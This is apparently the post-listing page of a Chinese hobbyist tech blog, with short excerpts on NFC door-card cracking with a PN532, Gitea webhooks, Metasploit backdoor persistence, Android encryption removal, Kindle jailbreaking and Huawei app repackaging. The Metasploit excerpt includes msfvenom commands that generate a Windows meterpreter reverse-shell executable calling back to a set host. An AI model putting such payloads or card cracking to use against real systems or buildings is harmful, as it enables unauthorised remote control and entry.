安卓使用 PN532 读写 NFC
动机
安卓手机本身的NFC功能不全且爆破密码太慢,于是买了个PN532破小区门卡。
Windows上有现成的工具MifareOneTool和教程,很轻松就解决了,于是想着能否在安卓的Termux上复现,于是就有了这篇文章。
准备
物质准备
PN532,我买的是这个的PN532+CH340G套餐
一台有OTG功能的安卓手机,安卓版本最低为7.0
自行焊接PN532的引脚
焊接完成后按下表接线,注意PN532上面有两个调节工作模式的开关(开关上覆膜),这里不需要调节。
PN532
USB转TTL模块
USB转TTL线(具体颜色不重要)
GND
GND
...
开始使用 Bootstrap
动机
由于非常想要一个像样的警告框,于是随便搞了个前端框架,仅作记录
demo
Well done!
Great! Here comes a link.
Whenever you need to, be sure to use margin utilities to keep things nice and tidy.
An example notice alert with an icon
An example notice question with an icon
An example danger alert with an icon
An example error alert with an ico...
使用 Python 内置模块接收 Gitea Webhook 以自动更新
动机
由于完全没找到个像样的Webhook轮子和自动更新轮子,所以自己乱写了一个。单线程,但是it just works™
Gitea
以下假设你的生产服务器地址为192.168.33.44。
配置文件
Webhook 配置文件文档,包括对loopback等特殊取值的说明
跑Gitea的服务端要改一下custom/conf/app.ini,最后加上以下这一段内容,然后重启Gitea
(loopback指的是跑Gitea的服务器自己,一般不建议添加)
[webhook]
ALLOWED_HOST_LIST = 192.168.33.44,loopback
Webhook 设置
Webhook 配置文档
设置->Web 钩子->添加 We...
为 Metasploit 的后门内置 persistence
新版
重构后的项目位于Young-Lord/msf-remote-logger,直接用这个就可以了。(开源协议:AGPL-3.0)
前言
依旧是一篇名不副实的博文。说到底是跑了个Python监听服务器,然后自动处理连接过来的session。
代码很烂,但又不是不能用。基于WTFPL协议共享。
正文
# pip install tendo pymetasploit3
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.13.106 LPORT=7787 --platform Windows -f exe > b.exe
# msfvenom -p windows/meterpreter/reve...
关闭 Android 文件系统强制加密
参考资料
如何为采用动态分区的高通设备禁用 data 分区强制加密
简单来说就是依次在/product, /vendor, /system分区下寻找etc/fstab.qcom文件,把,fileencryption=ice改成,encryptable=ice或者直接删掉,然后清除data分区。
修改后,还需要在Recovery内禁用AVB校验。
文中还提到了使用magiskboot hexpatch支持动态分区的设备的方法。
Kindle 越狱记录
背景
Kindle Voyage一直在吃灰,一年前刚好能越狱,就越了个狱并探索了一下。此处做一些记录。
越狱
这里就直接摆书伴的教程了,比较麻烦,全程可以使用手机OTG功能完成。
基础框架
JailBreak Hotfix,必须先装,防止越狱失效
MRPI, KUAL,插件管理器
在连接电脑后显示的根目录新建一个目录update.bin.tmp.partial,防止Kindle更新
插件
建议先把书伴的列表与NiLuJe的列表都看一遍,下面很多插件下载链接都在这里
大部分插件安装只需将文件夹放进extensions目录下即可,小部分以.bin结尾的,需要通过;log mrpi刷入,具体可以看书伴的教程
KOReader, KPVBooklet,极大增强的电子书阅读...
华为hap安装包逆向记录
背景
最近对华为智能手表(HarmonyOS 2)应用商店中的程序进行了提取、解包、修改以及修改包名后重新安装,而全程没有找到这方面的教程,故稍作记录。
本文全程未用到DevEco Studio,并且仅在Windows 10系统下尝试可行。理论上其它操作系统也可完成本文全部流程。
目标应用包名为com.company.victim,修改后的新包名为moe.person.attack
使用的工具(依赖)
Java (JDK)
Android SDK Platform-Tools
Apktool
smali/baksmali
jadx-gui
hapsigntoolv2.jar (GitHub) (Gitee)
jarsigner(默认随JDK安装)...
使用谷歌相机与相册的记录
正文
谷歌基础框架
Xposed模块 - FakeGApps
FakeGApps - 伪装Google应用已安装
Magisk模块 - MinMicroG
接着,在Magisk中刷入MinMicroG:首先在这里
下载MinMicroG-Minimal-2.11.1-20220202153430.zip,
刷入,重启后打开microG Settings确认安装情况。
谷歌相机
安卓应用 - GCam
在公众号“好青年耗子”提供的天翼云盘链接(访问码v2qy)中下载安装1117.自动调用副摄-优化照片算法、增加人脸识别MGC_8.1.101_A9_GV1l_snap.apk(或者使用官方链接)
谷歌相册
Xposed模块 - Pixelify GPhotos
Pix...
共计 58 篇文章,8 页。